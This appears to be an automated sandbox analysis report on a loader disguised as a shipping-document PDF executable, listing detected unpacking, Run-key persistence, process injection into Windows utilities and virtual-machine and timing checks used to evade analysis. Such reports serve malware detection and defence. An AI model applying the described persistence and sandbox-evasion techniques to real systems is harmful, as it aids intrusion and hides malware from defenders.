        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Binary string: cmmon32.pdb source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
        Source: Binary string: netsh.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
        Source: Binary string: cmmon32.pdbGCTL source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
        Source: Binary string: wntdll.pdbUGP source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.376044686.0000000000B60000.00000040.00000001.sdmp, Nyedvqj.exe, 00000011.00000002.376043225.00000000009B0000.00000040.00000001.sdmp, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
        Source: Binary string: netsh.pdbGCTL source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
        Source: Binary string: wntdll.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, Nyedvqj.exe, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
        Source: Binary string: svchost.pdb source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp
        Source: Binary string: svchost.pdbUGP source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp

        Data Obfuscation:

        barindex
        Yara detected DBatLoaderShow sources
        Source: Yara matchFile source: 0000000E.00000002.341748115.00000000023CA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.322398539.00000000009FA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.299172533.0000000000B1A000.00000004.00000001.sdmp, type: MEMORY
        Detected unpacking (changes PE section rights)Show sources
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeUnpacked PE file: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeUnpacked PE file: 17.2.Nyedvqj.exe.400000.0.unpack .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeUnpacked PE file: 18.2.Nyedvqj.exe.400000.0.unpack .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03821BF0 push ebx; retf
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03826691 push 00000066h; retf
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_038266F9 push ebp; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03826629 push esi; iretd
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03822655 push ebp; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03822585 push esi; iretd
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_038225ED push 00000066h; retf
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03823DFC pushfd ; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03826528 push esi; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03822484 push esi; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03825C94 push ebx; retf
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_038238C8 push edi; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03821BF0 push ebx; retf
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03826691 push 00000066h; retf
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_038266F9 push ebp; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03826629 push esi; iretd
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03822655 push ebp; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03822585 push esi; iretd
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_038225ED push 00000066h; retf
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03823DFC pushfd ; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03826528 push esi; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03822484 push esi; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_03825C94 push ebx; retf
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 1_3_038238C8 push edi; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041B832 push eax; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041B83B push eax; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041B89C push eax; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00415D38 push es; retf
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041CDC5 push es; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041A5BB pushfd ; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041B7E5 push eax; ret
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeFile created: \original shipment doc ref 2853801324189923,pdf.exe
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeFile created: \original shipment doc ref 2853801324189923,pdf.exe
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeFile created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeJump to dropped file
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NyedvqjJump to behavior
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NyedvqjJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000000BD8604 second address: 0000000000BD860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002B28604 second address: 0000000002B2860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000000BD899E second address: 0000000000BD89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002B2899E second address: 0000000002B289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000D68604 second address: 0000000000D6860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000D6899E second address: 0000000000D689A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\explorer.exe TID: 4472Thread sleep time: -35000s >= -30000s
        Source: C:\Windows\SysWOW64\netsh.exe TID: 2940Thread sleep time: -34000s >= -30000s
        Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_004088D0 rdtsc
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeProcess information queried: ProcessInformation
        Source: explorer.exe, 0000000D.00000000.342756318.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.298968913.00000000007C2000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000C.00000002.322309602.00000000007DB000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000E.00000002.341331996.00000000006DB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
        Source: explorer.exe, 0000000D.00000000.343112682.00000000089B5000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}""
        Source: explorer.exe, 0000000D.00000000.325727798.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
        Source: explorer.exe, 0000000D.00000000.343112682.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
        Source: explorer.exe, 0000000D.00000000.329523937.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
        Source: Nyedvqj.exe, 0000000E.00000002.341331996.00000000006DB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW,
        Source: explorer.exe, 0000000D.00000000.343112682.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
        Source: explorer.exe, 0000000D.00000000.313224825.000000000DCB9000.00000004.00000001.sdmpBinary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_004088D0 rdtsc
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeProcess token adjusted: Debug
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeProcess token adjusted: Debug
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBF0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBF0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBF0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C1B8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC90AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B89080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C03884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C03884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B858EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C51074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C42073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C54015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C54015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C07016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C07016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C07016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BA0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BA0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB61A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB61A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C141E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB2990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BAC182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBA185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C069A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BA4120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B89100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B89100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B89100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8C962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BAB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BAB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBFAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBD294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBD294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB2AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB2ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC4A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC4A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C14257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C3B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C3B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BA3A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C58A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B85210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B85210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B85210 mov eax, dword ptr fs:[00000030h]
